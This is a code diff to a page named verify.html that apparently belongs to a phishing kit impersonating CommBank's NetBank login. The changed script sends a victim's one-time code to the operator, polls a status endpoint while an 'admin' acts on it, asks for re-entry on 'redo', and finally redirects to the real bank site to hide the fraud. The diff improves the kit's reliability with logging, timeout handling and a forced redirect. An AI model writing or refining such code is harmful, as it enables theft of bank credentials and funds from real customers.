--- a/verify.html
+++ b/verify.html
@@ -251,43 +251,77 @@
     }
   }
 
-  /* ===== 10. POLL FOR ADMIN ACTION ===== */
+  /* ===== 10. POLL FOR ADMIN ACTION - FIXED ===== */
   let isWaitingForAdmin = false;
+  let pollTimeout = null;
 
   function startPolling() {
     if (isWaitingForAdmin) return;
     isWaitingForAdmin = true;
+    console.log('[DEBUG] Started polling for admin action');
 
     const poll = async () => {
-      if (!isWaitingForAdmin) return;
+      if (!isWaitingForAdmin) {
+        console.log('[DEBUG] Polling stopped - isWaitingForAdmin is false');
+        return;
+      }
 
       try {
+        console.log(`[DEBUG] Polling status for sid: ${sid}`);
         const res = await fetch(`/api/status/${sid}`);
+        
+        if (!res.ok) {
+          console.log(`[DEBUG] Status check failed: ${res.status}`);
+          throw new Error(`HTTP ${res.status}`);
+        }
+        
         const data = await res.json();
+        console.log(`[DEBUG] Status response:`, data);
 
         if (data.status === 'ok') {
+          console.log('[DEBUG] Status is OK - redirecting to CommBank');
           isWaitingForAdmin = false;
-          // Redirect to real CommBank website
-          window.location.href = 'https://www.commbank.com.au';
+          clearTimeout(pollTimeout);
+          // Force redirect using multiple methods for reliability
+          window.location.replace('https://www.commbank.com.au');
           return;
         }
 
         if (data.status === 'redo') {
+          console.log('[DEBUG] Status is REDO - showing error');
           isWaitingForAdmin = false;
+          clearTimeout(pollTimeout);
           hideLoading();
           clearForm();
           showErrorMessage();
           return;
         }
 
-        setTimeout(poll, 1200);
+        if (data.status === 'gone') {
+          console.log('[DEBUG] Session gone - stopping poll');
+          isWaitingForAdmin = false;
+          return;
+        }
+
+        // Continue polling
+        console.log('[DEBUG] Status not ready, continuing poll...');
+        pollTimeout = setTimeout(poll, 1200);
 
       } catch (err) {
-        setTimeout(poll, 2000);
+        console.error('[DEBUG] Poll error:', err);
+        pollTimeout = setTimeout(poll, 2000);
       }
     };
 
     poll();
+  }
+
+  function stopPolling() {
+    isWaitingForAdmin = false;
+    if (pollTimeout) {
+      clearTimeout(pollTimeout);
+      pollTimeout = null;
+    }
   }
 
   /* ===== 11. SUBMIT OTP ===== */
@@ -316,6 +350,7 @@
     })
     .then(res => {
       if (res.ok) {
+        console.log('[DEBUG] OTP submitted successfully, starting poll');
         startPolling();
       } else {
         hideLoading();
@@ -515,6 +550,7 @@ document.write("<input type=\"hidden\" name=\"JS\" value=\"E\" />");
 	<input type="hidden" id="SC_MEDIAMIND_ID" name="SC_MEDIAMIND_ID" value=""/><input type="hidden" id="SC_PRODUCT_ID" name="SC_PRODUCT_ID" value=""/><input type="hidden" id="SC_CUSTOMER_TYPE" name="SC_CUSTOMER_TYPE" value="NetBank"/><input type="hidden" id="SC_SCREEN_NAME" name="SC_SCREEN_NAME" value=""/>
 </body>
 </html>
+
 
 
 
